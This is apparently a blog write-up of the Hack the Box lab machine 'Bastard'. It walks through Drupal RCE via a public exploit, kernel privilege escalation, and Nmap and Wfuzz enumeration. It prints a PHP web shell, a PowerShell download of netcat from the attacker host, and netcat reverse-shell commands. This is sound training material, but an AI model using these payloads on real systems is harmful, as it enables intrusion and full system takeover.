Post

Bastard

Posted
By Peter Soverns 4 min read

Overview

Bastard is a vulnerable machine from Hack the Box that requires some web app enumeration and using a public exploit for remote code execution on a vulnerable service. The foothold is accomplished after gaining access to a login page, exploiting the file upload to retreive a file from our attacker machine and get a shell back. The privilege escalation is accomplished through enumerating the host for potential exploits, and after finding a kernel vulnerability, grabbing a public exploit to do local privilege escalation.

Nmap Scan

sudo nmap -sS -p- 10.10.10.9 -vvv

  • 80/tcp open http syn-ack ttl 127
  • 135/tcp open msrpc syn-ack ttl 127
  • 49154/tcp open unknown syn-ack ttl 127
1
2
3
4
5
6
7
8
9
10
11
12

|_http-generator: Drupal 7 ([http://drupal.org](http://drupal.org/))
|_http-title: Welcome to Bastard | Bastard
| http-robots.txt: 36 disallowed entries

| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/

Basic Enumeration

Wfuzz Directory Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

"misc"
"themes"
"user"
"0"
"modules"
"scripts"
"node"
"sites"
"includes"
"profiles"
"Misc"
"Themes"
"Scripts"
"rest"
"User"
"Modules"
"Sites"

The login page allows us to create new account. We cannot create an account like 'OR 1=1 OR'. We have to create a regular account. There isn’t anything real interesting after signing in as a regular user.

  • Looking more at robots.txt, we can see that php is used on the site.
    • PHP 5.2.4
    • This is the web server: Drupal 7.54, 2017-02-01

Digging around, we are able to see this web server is vulnerable to remote code execution, and there are public exploits, one in php available.

  • https://www.exploit-db.com/exploits/41564
  • You will need php-curl to be installed to execute this properly.
  • This exploit will upload a file onto a specific path on the web server. The path rest_endpoint does not exist, but rest is on the web server. We changed the name of the file we are going to upload to dath.php, and added some additional code to give us additional functionality.
1
2
3
4
5
6
7
8
9
10

$phpCode = <<<'EOD'
<?php
	if (isset($_REQUEST['fupload'])) {
		file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.16.5/8000/" . $_REQUEST['fupload']));
	};
	if (isset($_REQUEST['fexec'])) {
		echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
	};
?>
EOD;

The code executes successfully, and downloads some json files. One such file is interesting, which is the admin login that has their cookie. We can use a browser extension to add the cookie, go to the login portal, and refresh the page. Without even needing a password, we walk right into the web portal.

Foothold

Since the php file is uploaded, we can go to the path in the web portal under /rest/dath.php, and execute commands on the host.

  • Using the fexec, we can execute commands through the browser.
    • fexec=echo (New-Object System.Net.WebClient).Downloadfile('http://10.10.16.5:8000/nc64.exe','nc64.exe') | powershell -noprofile -
      • We tried to use the fupload command that was also sent as part of the php execution, but it wouldn’t work for me.
    • Netcat is a great tool to use in this case, once downloaded onto the victim machine, we can execute a command to get a shell back over netcat.
    • http://10.10.10.9/dath.php?fexec=nc64.exe -e cmd.exe 10.10.16.5 8081

Now we are into the machine, and get user.txt.

User

Local Enumeration

To find some exploits that are easy for us, this server is quite old, so we can run an enumeration script like PowerUp.ps1, Sherlock.ps1, or Winpeas.exe. In this example, we ran Sherlock.ps1.

  • It is also possible to run systeminfo, grab the system info, and run it against Windows Exploit Suggester. This is not only available inside of Metasploit, but you can also get a version directly in Kali. You can execute it against saved system info like this:
    • /home/dathalind/.local/bin/wes system.txt >> exploits.txt

Sherlock shows us that there are 2 possible exploits:

1
2
3
4
5
6
7
8
9
10
11

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Privilege Escalation

We end up using the exploit against MS15-051, which you can obtain from this github repo here.

  • When you run it on the machine, you can just run it against the command whoami, and it should return the result of nt authority\system.
  • To get a shell, we can run it to execute nc64.exe to get an escalated shell back to our attacker machine:
    • hax.exe "nc64.exe -e cmd.exe 10.10.16.5 5555"

We get a shell back, and can now read root.txt.

Root

ctf, security, hacking, exploits, web application, os command injections
ctf security hacking exploits web application os command injections
This post is licensed under CC BY 4.0 by the author.